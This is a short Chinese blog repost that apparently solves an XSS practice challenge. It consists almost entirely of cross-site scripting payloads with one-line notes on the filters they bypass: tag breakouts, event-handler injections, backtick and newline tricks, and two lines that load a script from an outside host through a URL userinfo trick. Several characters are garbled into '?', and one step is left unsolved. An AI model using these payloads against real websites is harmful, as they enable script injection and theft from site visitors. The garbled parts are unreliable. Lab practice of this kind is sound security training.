标签:amp textarea 转义 -- svg image htm ges 技术
<script>alert(1)</script>
</textarea><script>alert(1)</script><textarea>
"><script>alert(1)</script><"
将()替换成空字符
<script>alert`1`</script>
使用反引号
()和反引号都过滤
<svg><script>alert(1)</script> 进行html编码 <svg><script>alert(1)</script>
-->替换成了笑脸
--!><script>alert(1)</script><--
匹配auto和on开头加=的数据,>符号,替换为_
在等号前换行
onmousedown
=alert(1)
过滤以<开头 以>结尾的字符串
<img src=1 onerror="alert(1)"
</style ><script>alert(1)</script><style>
X09
https://www.segmentfault.com
https://www.segmentfault.com"></script><script>alert(1)//
https://www.segmentfault.com@xss.haozi.me/j.js
https://www.segmentfault.com@vps地址/xss.js
将输?的字符串转换成?写
<svg onload=alert(1)>
html编码
<svg onload=alert(1)>
<svg onload=alert(1)>
//只能注释单行,利?换?逃逸注释,利?html的"-->"注释掉后?字符
换行
alert(1)
-->
未解决出来
‘);alert(1)//
alert(1)
");alert(1)//
将双引号进行了转义
\");alert(1)//
标签:amp textarea 转义 -- svg image htm ges 技术
原文地址:https://www.cnblogs.com/bingtang123/p/13300413.html
